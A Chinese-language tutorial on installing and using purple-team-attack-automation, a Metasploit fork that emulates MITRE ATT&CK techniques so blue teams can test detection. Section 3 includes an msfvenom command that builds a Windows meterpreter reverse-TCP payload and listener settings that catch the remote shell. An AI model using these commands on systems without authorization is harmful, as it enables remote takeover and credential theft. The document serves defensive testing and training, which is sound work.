1. 簡介
該工具是原始metasploit框架的分支,用於模擬攻擊者的戰術,技術和程序(TTP)。該工具的主要重點是幫助Blue Teams瞭解其映射到MITER ATT&CK™框架的檢測差距。
2. 可用模塊
2.1 Windows
- Windows:ADIDNS(PowerMad)
- Windows:Active Directory自動發現(BloodHound)
- Windows:數據壓縮(T1002)
- Windows:憑證轉儲(T1003)
- Windows:Winlogon幫助器DLL(T1004)
- Windows:來自本地系統的數據(T1005)
- Windows:系統服務發現(T1007)
- Windows:應用程序窗口發現(T1010)
- Windows:查詢註冊表(T1012)
- Windows:端口監視器(T1013)
- Windows:輔助功能(T1015)
- Windows:系統網絡配置發現(T1016)
- Windows:遠程系統發現(T1018)
- Windows:快捷方式修改(T1023)
- Windows:Windows遠程管理(T1028)
- Windows:修改現有服務(T1031)
- Windows:系統所有者/用戶發現(T1033)
- Windows:路徑攔截(T1034)
- Windows:服務執行(T1035)
- Windows:僞裝(T1036)
- Windows:登錄腳本(T1037)
- Windows:文件系統權限不足(T1044)
- Windows:Windows管理規範(T1047)
- Windows:系統網絡連接發現(T1049)
- Windows:新服務(T1050)
- Windows:計劃任務(T1053)
- Windows:流程注入(T1055)
- Windows:輸入捕獲(T1056)
- Windows:進程發現(T1057)
- Windows:運行鍵(T1060)
- Windows:安全軟件發現(T1063)
- Windows:權限組發現(T1069)
- Windows:從工具中刪除指示器(T1070)
- Windows:通過哈希(T1075)
- Windows:Windows管理員共享(T1077)
- Windows:有效帳戶(T1078)
- Windows:文件中的憑據(T1081)
- Windows:系統信息發現(T1082)
- Windows:文件和目錄發現(T1083)
- Windows:Windows管理規範事件訂閱(1084)
- Windows:Rundll32(T1085)
- Windows:PowerShell(T1086)
- Windows:帳戶發現(T1087)
- Windows:繞過UAC(T1088)
- Windows:禁用安全工具(T1089)
- Windows:Windows NTFS擴展屬性(T1096)
- Windows:帳戶操作(T1098)
- Windows:Timestomp(T1099)
- Windows:AppInit DLL(T1103)
- Windows:遠程文件複製(T1105)
- Windows:文件刪除(T1107)
- Windows:暴力破解(T1110)
- Windows:修改註冊表(T1112)
- Windows:屏幕捕獲(T1113)
- Windows:剪貼板數據(T1115)
- Windows:Regsvr32(T1117)
- Windows:InstallUtil(T1118)
- Windows:自動收集(T1119)
- Windows:外圍設備發現(T1120)
- Windows:Regsvcs/Regasm(T1121)
- Windows:音頻捕獲(T1123)
- Windows:系統時間發現(T1124)
- Windows:視頻捕獲(T1125)
- Windows:受信任的開發人員實用程序(T1127)
- Windows:安裝根證書(T1130)
- Windows:身份驗證程序包(T1131)
- Windows:網絡共享發現(T1135)
- Windows:創建帳戶(T1136)
- Windows:MSHTA(T1170)
- Windows:分佈式組件對象模型(T1175)
- Windows:屏幕保護程序(T1180)
- Windows:CMSTP(T1191)
- Windows:控制面板項目(T1196)
- Windows:BITS作業(T1197)
- Windows:密碼策略發現(T1201)
- Windows:Kerberoasting(T1208)
- Windows:時間提供者(T1209)
- Windows:簽名的二進制代理執行(T1218)
2.2 Linux
- Linux:系統網絡配置發現(T1016)
- Linux:系統所有者/用戶發現(T1033)
- Linux:系統網絡連接發現(T1049)
- Linux:進程發現(T1057)
- Linux:權限組發現(T1069)
- Linux:系統信息發現(T1082)
- Linux:帳戶發現(T1087)
- Linux:文件刪除(T1107)
- Linux:密碼策略發現(T1201)
2.3 MacOS
- macOS:數據壓縮(T1002)
- macOS:系統網絡配置發現(T1016)
- macOS:網絡共享發現(T1135)
- macOS:創建帳戶(T1136)
- macOS:Bash歷史記錄(T1139)
- macOS:密碼策略發現(T1201)
2.4 Multi
- Multi:遠程系統發現(T1018)
- Multi:網絡服務掃描(T1046)
具體可參考官方wiki介紹:https://github.com/praetorian-code/purple-team-attack-automation/wiki/Available-Modules
2.工具部署及安裝方法
2.1 docker/docker-compose安裝
apt-get install docker docker-compose
2.2 下載項目文件至本地
git clone https://github.com/praetorian-code/purple-team-attack-automation.git
2.3 修改LHOST和端口
echo "version: '3'
services:
ms:
environment:
# example of setting LHOST
LHOST: 0.0.0.0
# example of adding more ports
ports:
- 8080:8080
- 443:443
- 80:80
" > docker-compose.local.override.yml #此文件需要自行創建,然後複製上述內容寫入文檔即可
2.4 設置COMPOSE_FILE環境變量
echo "COMPOSE_FILE=./docker-compose.yml:./docker-compose.override.yml:./docker-compose.local.override.yml" >> .env
2.5 運行docker服務並運行工具
service docker start
docker-compose build
./docker/bin/msfconsole #當前目錄下執行此命令
其他環境安裝可參考官方說明:https://github.com/praetorian-code/purple-team-attack-automation/wiki/Installation
3. 操作與使用
3.1 生成Meterpreter有效載荷
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<Your locahost IP> LPORT=4444 -f exe > meterpreter.exe #新建窗口執行命令,利用此命令生成的MSF載荷可能存在問題,建議自行修改
3.2 啓動並運行本地監聽
use exploit/multi/handler
set Interrupt: use the 'exit' command to quit
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST <Attacker IP Address>
set LPORT 4444
exploit -j -z
# docker msfconsole中執行監聽命令
複製並在目標(“受害者”)主機上以管理員身份運行payload.exe,然後等待會話。
3.3 查看已有TTP模塊
search purple
# docker msfconsole中執行
3.4 模擬T1087
use modules/post/windows/purple/t1087 #設置要使用的TTP
info #查看TTP模塊配置
set session 1 #設置會話
run #執行載荷
#docker msfconsole中執行
後續
安全從業人員(尤其是藍隊成員),可以利用purple-team-attack-automation模擬相關TTP,並在客戶端部署並配置相關審覈策略,記錄相關事件日誌(windows_log/sysmon/message),並轉發至大數據分析平臺(splunk/elk等)進行數據分析,提升藍隊成員對攻擊的理解以及對異常行爲的敏感度。
關於purple-team-attack-automation(紫色團隊攻擊自動化)更多信息可參考項目原址介紹:https://github.com/praetorian-code/purple-team-attack-automation
關於ATT&CK具體TTP中文介紹可參考瀚思科技MITRE ATT&CK 攻擊知識庫(企業)中文版項目:https://hansight.github.io/#/
關於ATT&CK具體TTP原文介紹可參考MITER官方介紹:https://attack.mitre.org/